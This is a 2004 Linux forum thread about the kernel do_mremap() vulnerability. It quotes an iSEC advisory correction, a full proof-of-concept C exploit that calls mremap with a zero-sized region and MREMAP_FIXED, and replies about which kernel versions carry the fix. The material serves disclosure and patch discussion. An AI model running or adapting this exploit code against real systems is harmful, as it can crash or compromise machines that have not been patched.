Critical Kernel vulnerability

[zaeemarshad]

take a look at this

http://www.infoworld.com/article/04/01/ ... ole_1.html

thats strange. two flaws in the kernel!!! I thought they changed the VM in 2.6 series???

Regards
Zaeem

[LinuxFreaK]

Dear Zaeemarshad,
Salam,

take a look at this
http://www.infoworld.com/article/04/01/ ... ole_1.html
thats strange. two flaws in the kernel!!! I thought they changed the VM in 2.6 series???

Date: Tue, 6 Jan 2004 17:30:35 +0100 (CET)
From: "Paul Starzetz" <ihaquer@isec.pl> Add to Address Book
To: vulnwatch@vulnwatch.org, full-disclosure@lists.netsys.com, bugtraq@securityfocus.com
Subject: Linux mremap bug correction

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi,

our initial posting contains a mistake about the vulnerability of the
2.2
kernel series. Since the 2.2 kernel series doesn't support the
MREMAP_FIXED flag it is NOT vulnerable. The source states
"MREMAP_FIXED option added 5-Dec-1999" but it didn't make into recent
2.2.x. We apologize for inconvenience.

- --
Paul Starzetz
iSEC Security Research
http://isec.pl/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE/+uKwC+8U3Z5wpu4RAqd0AJ4m0jn+BBYuxgZC3ZDRgwl4u7MsNACeNzGB
4DstLw+HNr703e19zrA3cjg=
=5S9B
-----END PGP SIGNATURE-----

Date: Mon, 5 Jan 2004 22:22:39 +0100
From: "Christophe Devine" <devine@iie.cnam.fr> Add to Address Book
To: full-disclosure@lists.netsys.com, bugtraq@securityfocus.com
Subject: Linux kernel do_mremap() proof-of-concept exploit code

The following program can be used to test if a x86 Linux system
is vulnerable to the do_mremap() exploit; use at your own risk.

Code: Select all

$ cat mremap_poc.c

/*
 *  Proof-of-concept exploit code for do_mremap()
 *
 *  Copyright (C) 2004  Christophe Devine and Julien Tinnes
 *
 *  This program is free software; you can redistribute it and/or 
modify
 *  it under the terms of the GNU General Public License as published 
by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  
02111-1307  USA
 */

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE  1
#define MREMAP_FIXED    2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
                         size_t, old_size, size_t, new_size,
                         unsigned long, flags, void *, new_address );

int main( void )
{
    void *base;

    base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
                 MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

    real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
                 (void *) 0xC0000000 );

    fork();

    return( 0 );
}

It is, but not in 2.6.1-rc1. From http://isec.pl/vulnerabilities/isec-0013-mremap.txt: And from http://kernel.org/pub/linux/kernel/v2.6 ... -2.6.1-rc2

Don't allow mremap of zero-sized areas. The do_mremap() vulnerability is fixed in the 2.6 kernel only in 2.6.1-rc2, where as you tested on 2.6.1-rc1. The latest version of the 2.2 kernel is 2.2.25, but there was no immediate changelog available. However, it was created on January 3 so I suspect it would have the patch?

Best Regards.